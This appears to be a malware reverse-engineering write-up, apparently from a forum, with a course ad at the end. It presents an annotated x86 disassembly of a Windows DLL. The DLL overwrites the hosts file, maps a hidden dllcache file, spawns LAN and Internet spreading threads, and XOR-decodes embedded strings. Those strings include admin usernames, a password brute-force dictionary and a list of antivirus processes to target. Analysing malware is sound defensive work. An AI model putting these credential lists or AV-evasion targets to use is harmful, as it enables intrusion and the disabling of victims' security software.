10005CCD 75 3F jnz short 10005D0E ; eax等于不等于一就跳转
10005CCF 68 80000000 push 80 ; 分配80字节空间
10005CD4 FF15 94610010 call dword ptr [10006194] ; MSVCRT.malloc
10005CDA 85C0 test eax, eax ; pam80刚分配的地址空间
10005CDC 59 pop ecx
10005CDD A3 98940010 mov dword ptr [10009498], eax ; 把刚分配的空间pam80地址给10009498
10005CE2 75 04 jnz short 10005CE8
10005CE4 33C0 xor eax, eax ; 分配失败就返回false
10005CE6 EB 66 jmp short 10005D4E
10005CE8 8320 00 and dword ptr [eax], 0
10005CEB A1 98940010 mov eax, dword ptr [10009498]
10005CF0 68 04800010 push 10008004
10005CF5 68 00800010 push 10008000
10005CFA A3 94940010 mov dword ptr [10009494], eax
10005CFF E8 EA000000 call 10005DEE ; jmp 到 MSVCRT._initterm
10005D04 FF05 10900010 inc dword ptr [10009010] ; 【9010】加一
10005D0A 59 pop ecx
10005D0B 59 pop ecx
10005D0C EB 3D jmp short 10005D4B ; 退出是返回一,再【9498】存分配的80地址空间
10005D0E 85C0 test eax, eax
10005D10 75 39 jnz short 10005D4B ; 不等于零也跳转退出函数,返回1
10005D12 A1 98940010 mov eax, dword ptr [10009498]
10005D17 85C0 test eax, eax
10005D19 74 30 je short 10005D4B
10005D1B 8B0D 94940010 mov ecx, dword ptr [10009494]
10005D21 56 push esi
10005D22 8D71 FC lea esi, dword ptr [ecx-4]
10005D25 3BF0 cmp esi, eax
10005D27 72 12 jb short 10005D3B
10005D29 8B0E mov ecx, dword ptr [esi]
10005D2B 85C9 test ecx, ecx
10005D2D 74 07 je short 10005D36
10005D2F FFD1 call ecx
10005D31 A1 98940010 mov eax, dword ptr [10009498]
10005D36 83EE 04 sub esi, 4
10005D39 ^ EB EA jmp short 10005D25
10005D3B 50 push eax
10005D3C FF15 9C610010 call dword ptr [1000619C] ; MSVCRT.free
10005D42 8325 98940010 0>and dword ptr [10009498], 0
10005D49 59 pop ecx
10005D4A 5E pop esi
10005D4B 6A 01 push 1
10005D4D 58 pop eax
10005D4E C2 0C00 retn 0C
主函数创建的线程函数,创建几个子线程,创建了系统目录\dllcache\systembox.bak,并打开了该文件的内存映射
系统目录/drivers/etc/hosts文件在文件中写ASCII "127.0.0.1 localhost",CR,LF
1000332A 55 push ebp ; 线程过程函数
1000332B 8BEC mov ebp, esp
1000332D 6A FF push -1
1000332F 68 186D0010 push 10006D18
10003334 68 705E0010 push 10005E70 ; 定义excepion_re的第二成员进栈MSVCRT._except_handler3
10003339 64:A1 00000000 mov eax, dword ptr fs:[0] ; 前一个异常handler3,fs【0】上是exception_restration结构指针
1000333F 50 push eax
10003340 64:8925 0000000>mov dword ptr fs:[0], esp ; fs【0】指向刚定义的excepion_re
10003347 51 push ecx
10003348 51 push ecx
10003349 81EC 44010000 sub esp, 144 ; 分配空间
1000334F 53 push ebx
10003350 56 push esi
10003351 57 push edi
10003352 8965 E8 mov dword ptr [ebp-18], esp ; s_esp记录【ebp-18】
10003355 68 E4670010 push 100067E4 ; 创建事件 ASCII "4F9E860C-9BE9-474b-8FD1-F0EEDB20C77B"
1000335A 6A 00 push 0
1000335C 6A 01 push 1
1000335E 6A 00 push 0
10003360 FF15 38610010 call dword ptr [10006138] ; kernel32.CreateEventA
10003366 A3 80940010 mov dword ptr [10009480], eax ; hevent【9480】事件句柄
1000336B 833D 80940010 0>cmp dword ptr [10009480], 0
10003372 74 0D je short 10003381
10003374 FF15 94600010 call dword ptr [10006094] ; ntdll.RtlGetLastWin32Error
1000337A 3D B7000000 cmp eax, 0B7
1000337F 75 08 jnz short 10003389 ; 不是0b7错误就继续执行,是就退出
10003381 6A 00 push 0
10003383 FF15 98600010 call dword ptr [10006098] ; kernel32.ExitThread
10003389 8365 FC 00 and dword ptr [ebp-4], 0
1000338D E8 BB030000 call 1000374D ; 线程中可以创建事件,就调用sleep函数
10003392 834D FC FF or dword ptr [ebp-4], FFFFFFFF
10003396 EB 0B jmp short 100033A3
10003398 33C0 xor eax, eax
1000339A 40 inc eax
1000339B C3 retn
1000339C 8B65 E8 mov esp, dword ptr [ebp-18]
1000339F 834D FC FF or dword ptr [ebp-4], FFFFFFFF
100033A3 6A 00 push 0
100033A5 6A 00 push 0
100033A7 6A 00 push 0
100033A9 68 333F0010 push 10003F33
100033AE 6A 00 push 0
100033B0 6A 00 push 0
100033B2 FF15 68610010 call dword ptr [10006168] ; kernel32.CreateThread
100033B8 6A 00 push 0
100033BA 6A 00 push 0
100033BC 6A 00 push 0
100033BE 68 D7180010 push 100018D7
100033C3 6A 00 push 0
100033C5 6A 00 push 0
100033C7 FF15 68610010 call dword ptr [10006168] ; kernel32.CreateThread
100033CD 8945 E0 mov dword ptr [ebp-20], eax
100033D0 6A 00 push 0
100033D2 6A 00 push 0
100033D4 6A 00 push 0
100033D6 68 8D3A0010 push 10003A8D
100033DB 6A 00 push 0
100033DD 6A 00 push 0
100033DF FF15 68610010 call dword ptr [10006168] ; kernel32.CreateThread
100033E5 6A 00 push 0
100033E7 6A 00 push 0
100033E9 6A 00 push 0
100033EB 68 18460010 push 10004618
100033F0 6A 00 push 0
100033F2 6A 00 push 0
100033F4 FF15 68610010 call dword ptr [10006168] ; kernel32.CreateThread
100033FA 33C0 xor eax, eax
100033FC 40 inc eax
100033FD 74 36 je short 10003435
100033FF FF15 6C610010 call dword ptr [1000616C] ; kernel32.GetTickCount
10003405 8985 CCFEFFFF mov dword ptr [ebp-134], eax ; 获得系统开机到当前的时间
1000340B 8B85 CCFEFFFF mov eax, dword ptr [ebp-134] ; tickcount【ebp-134】
10003411 33D2 xor edx, edx
10003413 B9 E8030000 mov ecx, 3E8
10003418 F7F1 div ecx ; tickcount/3e8
1000341A 33D2 xor edx, edx
1000341C 6A 3C push 3C
1000341E 59 pop ecx
1000341F F7F1 div ecx
10003421 83F8 03 cmp eax, 3 ; tickcount/3e8/3c再跟3比较大小
10003424 72 02 jb short 10003428
10003426 EB 0D jmp short 10003435
10003428 68 E8030000 push 3E8 ; 等等3e8微妙
1000342D FF15 DC600010 call dword ptr [100060DC] ; kernel32.Sleep
10003433 ^ EB C5 jmp short 100033FA ; 再回去取系统时间,直到tickcount/3e8/3c比3小
10003435 68 04010000 push 104
1000343A 6A 00 push 0
1000343C 8D85 D0FEFFFF lea eax, dword ptr [ebp-130]
10003442 50 push eax
10003443 E8 46280000 call 10005C8E ; jmp 到 MSVCRT.memset
10003448 83C4 0C add esp, 0C
1000344B 68 04010000 push 104
10003450 8D85 D0FEFFFF lea eax, dword ptr [ebp-130]
10003456 50 push eax
10003457 FF15 2C610010 call dword ptr [1000612C] ; kernel32.GetSystemDirectoryA
1000345D 68 0C680010 push 1000680C ; ASCII "\drivers\etc\hosts"
10003462 8D85 D0FEFFFF lea eax, dword ptr [ebp-130]
10003468 50 push eax
10003469 FF15 E4600010 call dword ptr [100060E4] ; kernel32.lstrcatA
1000346F 6A 00 push 0
10003471 68 80000000 push 80
10003476 6A 03 push 3
10003478 6A 00 push 0
1000347A 6A 03 push 3
1000347C 68 000000C0 push C0000000
10003481 8D85 D0FEFFFF lea eax, dword ptr [ebp-130] ; 系统目录/drivers/etc/hosts
10003487 50 push eax
10003488 FF15 C0600010 call dword ptr [100060C0] ; kernel32.CreateFileA
1000348E 8945 D8 mov dword ptr [ebp-28], eax
10003491 C745 DC 2068001>mov dword ptr [ebp-24], 10006820 ; ASCII "127.0.0.1 localhost",CR,LF
10003498 6A 00 push 0
1000349A 8D45 E4 lea eax, dword ptr [ebp-1C]
1000349D 50 push eax
1000349E FF75 DC push dword ptr [ebp-24]
100034A1 FF15 C8600010 call dword ptr [100060C8] ; kernel32.lstrlenA
100034A7 50 push eax ; 长度
100034A8 FF75 DC push dword ptr [ebp-24] ; ASCII "127.0.0.1 localhost",CR,LF
100034AB FF75 D8 push dword ptr [ebp-28] ; 创建文件“系统目录/drivers/etc/hosts”,并向文件中写入“127.0.0.1 localhost
100034AE FF15 30610010 call dword ptr [10006130] ; kernel32.WriteFile
100034B4 FF75 D8 push dword ptr [ebp-28]
100034B7 FF15 18610010 call dword ptr [10006118] ; kernel32.SetEndOfFile
100034BD FF75 D8 push dword ptr [ebp-28]
100034C0 FF15 FC600010 call dword ptr [100060FC] ; kernel32.CloseHandle
100034C6 68 04010000 push 104
100034CB 6A 00 push 0
100034CD 68 28930010 push 10009328
100034D2 E8 B7270000 call 10005C8E ; jmp 到 MSVCRT.memset
100034D7 83C4 0C add esp, 0C
100034DA 68 04010000 push 104
100034DF 68 28930010 push 10009328
100034E4 FF15 2C610010 call dword ptr [1000612C] ; kernel32.GetSystemDirectoryA
100034EA 68 3C680010 push 1000683C ; ASCII "\dllcache\systembox.bak"
100034EF 68 28930010 push 10009328 ; 系统目录\dllcache\systembox.bak
100034F4 FF15 E4600010 call dword ptr [100060E4] ; kernel32.lstrcatA
100034FA 83A5 C8FEFFFF 0>and dword ptr [ebp-138], 0
10003501 EB 0D jmp short 10003510
10003503 8B85 C8FEFFFF mov eax, dword ptr [ebp-138]
10003509 40 inc eax
1000350A 8985 C8FEFFFF mov dword ptr [ebp-138], eax
10003510 83BD C8FEFFFF 6>cmp dword ptr [ebp-138], 64
10003517 7D 57 jge short 10003570 ; 创建64次文件才停止
10003519 6A 00 push 0
1000351B 68 80000000 push 80
10003520 6A 03 push 3
10003522 6A 00 push 0
10003524 6A 00 push 0
10003526 68 00000080 push 80000000
1000352B 68 28930010 push 10009328 ; 创建了系统目录\dllcache\systembox.bak
10003530 FF15 C0600010 call dword ptr [100060C0] ; kernel32.CreateFileA
10003536 8985 C4FEFFFF mov dword ptr [ebp-13C], eax
1000353C 83BD C4FEFFFF F>cmp dword ptr [ebp-13C], -1
10003543 74 21 je short 10003566
10003545 6A 00 push 0
10003547 FFB5 C4FEFFFF push dword ptr [ebp-13C]
1000354D FF15 C4600010 call dword ptr [100060C4] ; kernel32.GetFileSize
10003553 A3 84940010 mov dword ptr [10009484], eax
10003558 FFB5 C4FEFFFF push dword ptr [ebp-13C]
1000355E FF15 FC600010 call dword ptr [100060FC] ; kernel32.CloseHandle
10003564 EB 0A jmp short 10003570
10003566 6A 64 push 64 ; 等待64微秒
10003568 FF15 DC600010 call dword ptr [100060DC] ; kernel32.Sleep
1000356E ^ EB 93 jmp short 10003503
10003570 833D 84940010 0>cmp dword ptr [10009484], 0
10003577 0F86 F5000000 jbe 10003672
1000357D 833D 84940010 F>cmp dword ptr [10009484], -1
10003584 0F84 E8000000 je 10003672
1000358A 6A 00 push 0
1000358C 68 80000000 push 80
10003591 6A 03 push 3
10003593 6A 00 push 0
10003595 6A 01 push 1
10003597 68 00000080 push 80000000
1000359C 68 28930010 push 10009328 ; 再创建文件
100035A1 FF15 C0600010 call dword ptr [100060C0] ; kernel32.CreateFileA
100035A7 A3 04900010 mov dword ptr [10009004], eax
100035AC 6A 00 push 0
100035AE 6A 00 push 0
100035B0 6A 00 push 0
100035B2 6A 02 push 2
100035B4 6A 00 push 0
100035B6 FF35 04900010 push dword ptr [10009004] ; 创建文件映射,刚创建的文件句柄
100035BC FF15 58610010 call dword ptr [10006158] ; kernel32.CreateFileMappingA
100035C2 A3 74940010 mov dword ptr [10009474], eax
100035C7 6A 00 push 0 ; 映射字节,0表全部
100035C9 6A 00 push 0
100035CB 6A 00 push 0
100035CD 6A 04 push 4 ; 权限
100035CF FF35 74940010 push dword ptr [10009474] ; 映射文件一部分到线程空间,文件映射句柄
100035D5 FF15 10610010 call dword ptr [10006110] ; kernel32.MapViewOfFile
100035DB A3 70940010 mov dword ptr [10009470], eax ; 映射内存地址
100035E0 833D 54840010 0>cmp dword ptr [10008454], 0
100035E7 74 1E je short 10003607
100035E9 833D 70940010 0>cmp dword ptr [10009470], 0
100035F0 74 15 je short 10003607 ; 映射失败跳转
100035F2 6A 00 push 0
100035F4 6A 00 push 0
100035F6 6A 00 push 0
100035F8 68 1F310010 push 1000311F ; 线程过程函数
100035FD 6A 00 push 0
100035FF 6A 00 push 0 ; 映射成功,就创建线程
10003601 FF15 68610010 call dword ptr [10006168] ; kernel32.CreateThread
10003607 833D 60840010 0>cmp dword ptr [10008460], 0
1000360E 74 18 je short 10003628
10003610 6A 00 push 0
10003612 6A 00 push 0
10003614 68 54680010 push 10006854 ; 传入参数 ASCII "LAN"
10003619 68 65520010 push 10005265
1000361E 6A 00 push 0
10003620 6A 00 push 0
10003622 FF15 68610010 call dword ptr [10006168] ; kernel32.CreateThread
10003628 833D 5C840010 0>cmp dword ptr [1000845C], 0
1000362F 74 15 je short 10003646
10003631 6A 00 push 0
10003633 6A 00 push 0
10003635 6A 00 push 0
10003637 68 E1580010 push 100058E1
1000363C 6A 00 push 0
1000363E 6A 00 push 0
10003640 FF15 68610010 call dword ptr [10006168] ; kernel32.CreateThread
10003646 6A FF push -1 ; 无限等待
10003648 FF75 E0 push dword ptr [ebp-20] ; 等待过程函数为18d7的线程执行完
1000364B FF15 1C610010 call dword ptr [1000611C] ; kernel32.WaitForSingleObject
10003651 833D 64840010 0>cmp dword ptr [10008464], 0
10003658 74 18 je short 10003672
1000365A 6A 00 push 0
1000365C 6A 00 push 0
1000365E 68 58680010 push 10006858 ; 传入参数ASCII "Internet"
10003663 68 65520010 push 10005265
10003668 6A 00 push 0
1000366A 6A 00 push 0
1000366C FF15 68610010 call dword ptr [10006168] ; kernel32.CreateThread
10003672 833D 68840010 0>cmp dword ptr [10008468], 0
10003679 74 29 je short 100036A4
1000367B 6A 01 push 1
1000367D 0FB705 50840010 movzx eax, word ptr [10008450]
10003684 50 push eax
10003685 E8 E2DAFFFF call 1000116C
1000368A 83F8 01 cmp eax, 1
1000368D 75 15 jnz short 100036A4
1000368F 6A 00 push 0
10003691 6A 00 push 0
10003693 6A 00 push 0
10003695 68 CB5A0010 push 10005ACB
1000369A 6A 00 push 0
1000369C 6A 00 push 0
1000369E FF15 68610010 call dword ptr [10006168] ; kernel32.CreateThread
100036A4 833D 6C840010 0>cmp dword ptr [1000846C], 0
100036AB 74 7B je short 10003728
100036AD 8D85 A4FEFFFF lea eax, dword ptr [ebp-15C]
100036B3 50 push eax
100036B4 FF15 90600010 call dword ptr [10006090] ; kernel32.GetLocalTime
100036BA 33C0 xor eax, eax
100036BC 40 inc eax
100036BD 74 69 je short 10003728
100036BF 8D85 B4FEFFFF lea eax, dword ptr [ebp-14C]
100036C5 50 push eax
100036C6 FF15 90600010 call dword ptr [10006090] ; kernel32.GetLocalTime
100036CC 0FB785 BCFEFFFF movzx eax, word ptr [ebp-144]
100036D3 0FB78D ACFEFFFF movzx ecx, word ptr [ebp-154]
100036DA 2BC1 sub eax, ecx
100036DC 3B05 6C840010 cmp eax, dword ptr [1000846C]
100036E2 7C 37 jl short 1000371B
100036E4 66:8B85 BCFEFFF>mov ax, word ptr [ebp-144]
100036EB 66:8985 ACFEFFF>mov word ptr [ebp-154], ax
100036F2 6A 01 push 1
100036F4 0FB705 50840010 movzx eax, word ptr [10008450]
100036FB 50 push eax
100036FC E8 6BDAFFFF call 1000116C
10003701 83F8 01 cmp eax, 1
10003704 75 15 jnz short 1000371B
10003706 6A 00 push 0
10003708 6A 00 push 0
1000370A 6A 00 push 0
1000370C 68 CB5A0010 push 10005ACB
10003711 6A 00 push 0
10003713 6A 00 push 0
10003715 FF15 68610010 call dword ptr [10006168] ; kernel32.CreateThread
1000371B 68 60EA0000 push 0EA60
10003720 FF15 DC600010 call dword ptr [100060DC] ; kernel32.Sleep
10003726 ^ EB 92 jmp short 100036BA
10003728 33C0 xor eax, eax
1000372A 40 inc eax
1000372B 74 0D je short 1000373A
1000372D 68 10270000 push 2710
10003732 FF15 DC600010 call dword ptr [100060DC] ; kernel32.Sleep
10003738 ^ EB EE jmp short 10003728
1000373A 33C0 xor eax, eax
1000373C 8B4D F0 mov ecx, dword ptr [ebp-10]
1000373F 64:890D 0000000>mov dword ptr fs:[0], ecx
10003746 5F pop edi
10003747 5E pop esi
10003748 5B pop ebx
10003749 C9 leave
1000374A C2 0400 retn 4
线程自定义的函数:
sleep函数1000374D
函数功能:
睡眠【8480】秒
【【8488】】=((byte)【8488】-1)^a5
8518 ; 取字符串的一字节 ASCII "n,Administrator,Guest,admin,Root,"2c清零
8540; ASCII "n,1234,password,6969,harley,123456,golf,pussy,mustang,1111,shadow,1313,fish,5150,7777,qwerty,baseball
,2112,letmein,12345678,12345,ccc,admin,5201314,qq520,1,12,123,1234567,123456789,654321,54321,111,000000,abc,pw,11111111
,88888888,pass,pa"...2c清零
87B0 ; ASCII "360hotfix.exe|360rpt.exe|360safe.exe|360safebox.exe|360tray.exe|agentsvr.exe|apvxdwin.exe|ast.exe|
avcenter.exe|avengine.exe|avgnt.exe|avguard.exe|avltmain.exe|avp32.exe|avtask.exe|bdagent.exe|bdwizreg.exe|boxmod.exe|
ccapp.exe|ccenter.exe"... ; 处理完字符串就跳转,把7c和2c清零
函数的具体分析:
1000374D 55 push ebp ; sleep函数
1000374E 8BEC mov ebp, esp
10003750 51 push ecx
10003751 51 push ecx
10003752 8365 FC 00 and dword ptr [ebp-4], 0
10003756 FF35 80840010 push dword ptr [10008480]
1000375C FF15 DC600010 call dword ptr [100060DC] ; kernel32.Sleep
10003762 6A 40 push 40
10003764 6A 00 push 0
10003766 68 30940010 push 10009430 ; 【9430】清空
1000376B E8 1E250000 call 10005C8E ; jmp 到 MSVCRT.memset
10003770 83C4 0C add esp, 0C
10003773 68 00010000 push 100
10003778 6A 00 push 0
1000377A 68 28920010 push 10009228 ; 【9228】清零
1000377F E8 0A250000 call 10005C8E ; jmp 到 MSVCRT.memset
10003784 83C4 0C add esp, 0C
10003787 C745 FC 8884001>mov dword ptr [ebp-4], 10008488 ; 读取【8488】的一个字节
1000378E 8B45 FC mov eax, dword ptr [ebp-4]
10003791 0FBE00 movsx eax, byte ptr [eax]
10003794 85C0 test eax, eax ; 判断这个字节是否为零
10003796 74 2D je short 100037C5 ; 为零,处理完8488字符串,就跳转
10003798 8B45 FC mov eax, dword ptr [ebp-4] ; 不为零【8488】存在pstr(【ebp-4】),取一字节给【ebp-5】
1000379B 8A00 mov al, byte ptr [eax]
1000379D 8845 FB mov byte ptr [ebp-5], al
100037A0 8A45 FB mov al, byte ptr [ebp-5]
100037A3 2C 01 sub al, 1
100037A5 8845 FB mov byte ptr [ebp-5], al ; 存在【ebp-5】的字节减去一
100037A8 0FBE45 FB movsx eax, byte ptr [ebp-5]
100037AC 35 A5000000 xor eax, 0A5
100037B1 8845 FB mov byte ptr [ebp-5], al ; 【ebp-5】再和a5异或
100037B4 8B45 FC mov eax, dword ptr [ebp-4]
100037B7 8A4D FB mov cl, byte ptr [ebp-5]
100037BA 8808 mov byte ptr [eax], cl ; 【【8488】】=((byte)【8488】-1)^a5
100037BC 8B45 FC mov eax, dword ptr [ebp-4]
100037BF 40 inc eax
100037C0 8945 FC mov dword ptr [ebp-4], eax ; pstr[ebp-4]指向下一个字节
100037C3 ^ EB C9 jmp short 1000378E
100037C5 C745 FC D084001>mov dword ptr [ebp-4], 100084D0
100037CC 8B45 FC mov eax, dword ptr [ebp-4]
100037CF 0FBE00 movsx eax, byte ptr [eax] ; 取(byte)【84d0】判断是否为零
100037D2 85C0 test eax, eax
100037D4 74 2D je short 10003803
100037D6 8B45 FC mov eax, dword ptr [ebp-4] ; pstr【ebp-4】
100037D9 8A00 mov al, byte ptr [eax]
100037DB 8845 FA mov byte ptr [ebp-6], al
100037DE 8A45 FA mov al, byte ptr [ebp-6]
100037E1 2C 01 sub al, 1
100037E3 8845 FA mov byte ptr [ebp-6], al
100037E6 0FBE45 FA movsx eax, byte ptr [ebp-6]
100037EA 35 A5000000 xor eax, 0A5
100037EF 8845 FA mov byte ptr [ebp-6], al
100037F2 8B45 FC mov eax, dword ptr [ebp-4]
100037F5 8A4D FA mov cl, byte ptr [ebp-6]
100037F8 8808 mov byte ptr [eax], cl ; 【【8488】】=((byte)【8488】-1)^a5
100037FA 8B45 FC mov eax, dword ptr [ebp-4]
100037FD 40 inc eax
100037FE 8945 FC mov dword ptr [ebp-4], eax ; pstr【ebp-4】指向下雨字节
10003801 ^ EB C9 jmp short 100037CC ; 处理完两个字符串就执行
10003803 C745 FC 1885001>mov dword ptr [ebp-4], 10008518 ; ASCII "n,Administrator,Guest,admin,Root,"
1000380A 8B45 FC mov eax, dword ptr [ebp-4]
1000380D 0FBE00 movsx eax, byte ptr [eax] ; 取字符串的一字节 ASCII "n,Administrator,Guest,admin,Root,"
10003810 85C0 test eax, eax
10003812 74 1A je short 1000382E ; 处理完整个字符串就跳转,把字符串的2c清零
10003814 8B45 FC mov eax, dword ptr [ebp-4]
10003817 0FBE00 movsx eax, byte ptr [eax]
1000381A 83F8 2C cmp eax, 2C ; 字符串一字节是否是2c, ASCII "n,Administrator,Guest,admin,Root,"
1000381D 75 06 jnz short 10003825 ; 不是2c就跳转
1000381F 8B45 FC mov eax, dword ptr [ebp-4] ; 是2c,把该字节清零
10003822 C600 00 mov byte ptr [eax], 0
10003825 8B45 FC mov eax, dword ptr [ebp-4] ; pstr指向下一字节
10003828 40 inc eax
10003829 8945 FC mov dword ptr [ebp-4], eax
1000382C ^ EB DC jmp short 1000380A
1000382E C745 FC 4085001>mov dword ptr [ebp-4], 10008540 ; ASCII "n,1234,password,6969,harley,123456,golf,pussy,mustang,1111,shadow,1313,fish,5150,7777,qwerty,baseball,2112,letmein,12345678,12345,ccc,admin,5201314,qq520,1,12,123,1234567,123456789,654321,54321,111,000000,abc,pw,11111111,88888888,pass,pa"...
10003835 8B45 FC mov eax, dword ptr [ebp-4]
10003838 0FBE00 movsx eax, byte ptr [eax]
1000383B 85C0 test eax, eax
1000383D 74 1A je short 10003859 ; 处理完就跳转,把2c清零
1000383F 8B45 FC mov eax, dword ptr [ebp-4]
10003842 0FBE00 movsx eax, byte ptr [eax]
10003845 83F8 2C cmp eax, 2C
10003848 75 06 jnz short 10003850
1000384A 8B45 FC mov eax, dword ptr [ebp-4]
1000384D C600 00 mov byte ptr [eax], 0
10003850 8B45 FC mov eax, dword ptr [ebp-4]
10003853 40 inc eax
10003854 8945 FC mov dword ptr [ebp-4], eax
10003857 ^ EB DC jmp short 10003835
10003859 C745 FC B087001>mov dword ptr [ebp-4], 100087B0 ; ASCII "360hotfix.exe|360rpt.exe|360safe.exe|360safebox.exe|360tray.exe|agentsvr.exe|apvxdwin.exe|ast.exe|avcenter.exe|avengine.exe|avgnt.exe|avguard.exe|avltmain.exe|avp32.exe|avtask.exe|bdagent.exe|bdwizreg.exe|boxmod.exe|ccapp.exe|ccenter.exe"...
10003860 8B45 FC mov eax, dword ptr [ebp-4]
10003863 0FBE00 movsx eax, byte ptr [eax]
10003866 85C0 test eax, eax
10003868 74 25 je short 1000388F ; 处理完字符串就跳转,把7c和2c清零
1000386A 8B45 FC mov eax, dword ptr [ebp-4]
1000386D 0FBE00 movsx eax, byte ptr [eax]
10003870 83F8 7C cmp eax, 7C
10003873 74 0B je short 10003880
10003875 8B45 FC mov eax, dword ptr [ebp-4]
10003878 0FBE00 movsx eax, byte ptr [eax]
1000387B 83F8 2C cmp eax, 2C
1000387E 75 06 jnz short 10003886
10003880 8B45 FC mov eax, dword ptr [ebp-4]
10003883 C600 00 mov byte ptr [eax], 0
10003886 8B45 FC mov eax, dword ptr [ebp-4]
10003889 40 inc eax
1000388A 8945 FC mov dword ptr [ebp-4], eax
1000388D ^ EB D1 jmp short 10003860
1000388F C9 leave
10003890 C3 retn
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
